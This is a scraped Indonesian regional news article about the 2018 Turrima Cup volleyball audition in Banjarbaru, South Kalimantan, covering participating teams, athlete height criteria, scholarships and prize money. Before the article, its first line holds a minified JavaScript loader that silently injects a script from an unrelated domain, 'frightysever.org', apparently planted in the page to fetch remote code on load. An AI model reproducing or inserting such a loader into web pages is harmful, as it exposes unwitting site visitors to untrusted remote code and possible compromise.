(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Sport

PBVSI Kalsel-PT Turrima Agro Mas Borneo Cari Atlet Lewat Audisi Turrima Cup 2018


BANJARBARU, PBVSI Kalsel menggandeng PT Turrima Agro Mas Borneo menggelar audisi bola voli Turrima Cup 2018, 17-24 Februari 2018, di lapangan bola voli KS Tubun Banjarbaru.

Sekretaris Panitia Pelaksana Audisi Bola Voli Turrima Cup 2018 Solekan mengatakan, pertandingan ini diikuti oleh tim-tim dari Kalimantan Selatan. Kategori putra diikuti sebanyak 16 tim, sementara untuk kategori putri diikuti sebanyak 8 tim.

“Semua tim yang ada ini akan dicari bibit, dari PT Turrima mau ambil atlet dari Kalsel putra 6 orang dan putri 6 orang untuk dapat beasiswa sekolah di Jawa,” katanya Kepada Kanal Kalimantan, Sabtu (15/2).

Solekan menyampaikan, sebenarnya pertandingan dibuka untuk seluruh Kalimantan. Namun karena terkendala biaya, tim-tim dari luar Kalsel merasa keberatan untuk ikut serta dalam pertandingan yang dilaksanakan.

Sekretaris Umum PBVSI Kalsel Muchlis Muchtar menyambut baik dengan adanya pertandingan voli yang dilaksanakan.

“Hal ini merupakan sebuah rangsangan untuk generasi muda untuk bersaing dalam pertandingan voli sehingga bisa dimasukkan ke akademi Turrima,” ucapnya.

Muchlis menambahkan, kedepan atlet voli Kalsel bisa diambil dari sana.  Mereka dididik di Sidoarjo dengan perjanjian mereka harus bisa kembali ke daerah jika dibutuhkan.

Audisi atlet bola voli ini juga untuk menyiapkan tim voli Kalsel PON, dimana Kalsel digadang sebagai tuan rumah. Dengan harapan ke depan, sukses penyelenggaraan juga sukses atlet. “Kalau sukses penyelenggaran tapi atletnya ranking 20 kan rugi,” ujarnya.

Menurut Muchlis, untuk kriteria atlet yang paling utama dilihat terkait tinggi badan.  Kalau untuk Putra tinggi 180 cm ke atas, sementara putri dengan tinggi 170 cm ke atas. “Kalaupun permainan bagus namun tinggi di bawah standar masih susah bersaing secara nasional,” tambahnya.

Mashudi, pelatih bola voli yang turut berhadir untuk menyeleksi bibit di kejuaraan juga mengapreasi atas pelaksanaan audisi bola voli yang dilaksanakan oleh PT Turrima Agro Mas Borneo.

Mashudi menambahkan, Turrima berperan serta untuk mendukung kemajuan bola voli di Kalsel, dan sangat senang sekali ada upaya pencarian bibit baru dari Kalsel. Menurutnya kriteria yang dicari minimal tinggi putra 185 cm.

Pelatih bola voli berpengalaman ini menambahkan, lebih menekankan terkait latihan para atlet, bahkan kalau baju sudah basah ganti lagi sampai basah lagi. “Kalau ada kemauan, pasti bisa”, ucapnya.

Kiswono, Manager Marketing PT Turrima Agro Mas Borneo Area Kalimantan menyampaikan, tujuan dilaksanakannya audisi bola voli Turrima Cup untuk mencari bibit baru atlet voli di Kalsel. Nantinya bisa jadi atlet Kalsel, kalau sewaktu-sewaktu Kalsel memerlukan bisa dipanggil untuk membela Kalsel. Audisi yang dilaksanakan khusus usia 19 tahun ke bawah selain itu nantinya akan disediakan piala dan uang pembinaan bagi tim yang juara. “Dalam audisi ini setiap individu berkesempatan untuk menjadi atlet,” tambahnya.

“Bagi yang terpilih, nantinya akan disediakan asrama, biaya pendidikan, semuanya akan ditanggung oleh PT Turrima Agro Mas Borneo,” katanya.

Kiswono menambahkan, kegiatan ini merupakan salah satu program CSR yang dilaksanakan oleh PT Turrima Agro Mas Borneo. “Sementara ini baru melaksanakan di Kalsel dan ini merupakan program jangka panjang, dan harapannya bisa dilaksanakan setiap tahun, makanya ini diadakan piala bergilir,” ucapnya.

Pada pertandingan ini, selain menyeleksi bibit atlet bola voli untuk diberikan beasiswa, panitia juga menyediakan hadiah berupa uang pembinaan dan piala bagi tim yang menjadi juara yakni: Juara I mendapatkan uang pembinaan Rp 5 juta + tropi, Juara 2 mendapatkan Rp 3,5 juta + tropi, juara 3 Rp 2,5 juta + tropi dan juara 4 Rp 1,5 juta + tropi. (abdullah/hendera)

Berikut Tim Audisi Bola Voli Turrima Cup 2018:

 

Putri

Putri Beton B

Polsek Tapin Selatan

PDAM

Turrima

Tapin

Putri Beton A

SBV Banjarbaru

Nusantara

Putra

Turrima A

GS B

Sidomulyo

Batola Yunior

SMAN 2 Kotabaru

Tapin

SBV Banjarbaru

Nusantara A

Turrima B

RBS

SMAN 1 Sei Loban

Nusantara B

VB Senju

PDAM

GM Banjarbaru

GS A

Reporter: Abdullah/Hendera
Editor: Abi Zharrin Al Ghifari

Desy Arfianty

Recent Posts

Nurkhalis Anshari Menuju Pilwali Banjarbaru ‘Bergantung’ Poros Pilgub Kalsel

KANALKALIMANTAN.COM, BANJARBARU – Proses lobi politik terus dilakukan kader Partai Keadilan Sejahtera (PKS) Nurkhalis Anshari… Read More

2 jam ago

8 Nama Masuk Penjaringan DPC PKB Banjarbaru, Ada Ayah dan Anak dari Golkar

KANALKALIMANTAN.COM, BANJARBARU – Partai Kebangkitan Bangsa (PKB) pemilik 3 kursi di DPRD Kota Banjarbaru 2024-2029… Read More

3 jam ago

Jembatan Simpang 3 Lingkar Utara Banjarbaru Ditutup Sampai Akhir Tahun, Begini Pengalihan Lalin ke Bandara Syamsudin Noor

KANALKALIMANTAN.COM, BANJARBARU - Pengendara yang biasa melewati akses jembatan simpang tiga jalan Lingkar Utara, Kota… Read More

7 jam ago

Pilgub Kalsel 2024 Dipastikan Tanpa Pasangan Non Partai

Pendaftar Jalur Independen Pilkada di Kalsel Hanya 4 Daerah Read More

8 jam ago

Upah Dipotong untuk Tapera, Cuit Soleh Solihun Bikin Pekerja Ketar-ketir

KANALKALIMANTAN.COM, JAKARTA - Publik di platform sosial media tengah ramai membahas perihal pemotongan upah pekerja… Read More

8 jam ago

Kenaikan UKT Ditunda Mahasiswa Jangan Senang Dulu, Menunda Belum Membatalkan!

KANALKALIMANTAN.COM, JAKARTA - Politikus PDI Perjuangan Adian Napitupulu menyebut mahasiswa telah berhasil membuat semua orang… Read More

9 jam ago

This website uses cookies.